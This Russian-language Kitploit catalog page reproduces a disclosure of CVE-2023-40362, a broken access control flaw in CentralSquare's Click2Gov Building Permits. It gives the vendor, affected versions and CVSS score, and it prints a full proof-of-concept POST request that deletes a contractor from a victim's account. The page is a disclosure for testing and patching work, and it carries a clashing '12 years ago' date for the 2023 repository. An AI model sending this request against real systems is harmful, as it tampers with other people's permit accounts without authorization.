Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-40362 — CVE-2023-40362 — детали уязвимости и Proof of Concept | Kitploit
Инструменты/GitHubGitHub/ally-petitt/cve-2023-40362
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubally-petitt/cve-2023-40362

CVE-2023-40362

CVE-2023-40362 — детали уязвимости и Proof of Concept

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-40362

Сведения об уязвимости CVE-2023-40362 и концепт-эксплойт.

Обзор

Уязвимость контроля доступа в Click2Gov BP по URI /Click2GovBP/mastercontractorlist.html позволяет аутентифицированным пользователям удалять подрядчиков из учётных записей других пользователей, используя идентификатор пользователя жертвы и информацию об удаляемом подрядчике.

Причина — неспособность веб-приложения проверить, что пользователь авторизован для удаления подрядчика из учётной записи, идентификатор которой указан.

Поставщик: CentralSquare

Сообщил(а): Ally Petitt

Обнаружено: 13 июня 2023 г.

Затронутые продукты: Click2Gov Building Permits (BP)

Затронутые версии: до октября 2023 г.

CVSS v3: 5.4 — Умеренный (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)

Концепт-эксплойт (PoC)

Ниже показан HTTP POST-запрос, который можно выполнить для удаления подрядчика из учётной записи жертвы. Для успешного выполнения требуется действительный CSRF-токен.

root@kitploit:~
POST /Click2GovBP/mastercontractorlist.html HTTP/1.1
Host: <HOST>
Cookie: welcome=true; JSESSIONID=<SESSION_ID>;
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: <USER_AGENT>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

contractorList%5B0%5D.number=<CONTRACTOR_NUMBER>&contractorList%5B0%5D.type=<CONTRACTOR_TYPE>&contractorList%5B0%5D.name=<CONTRACTOR_NAME>&submitRemoveContractor=true&confirmRemoveContractor=true&userId=<USER_ID>&OWASP_CSRFTOKEN=<CSRF_TOKEN>
Скачать инструмент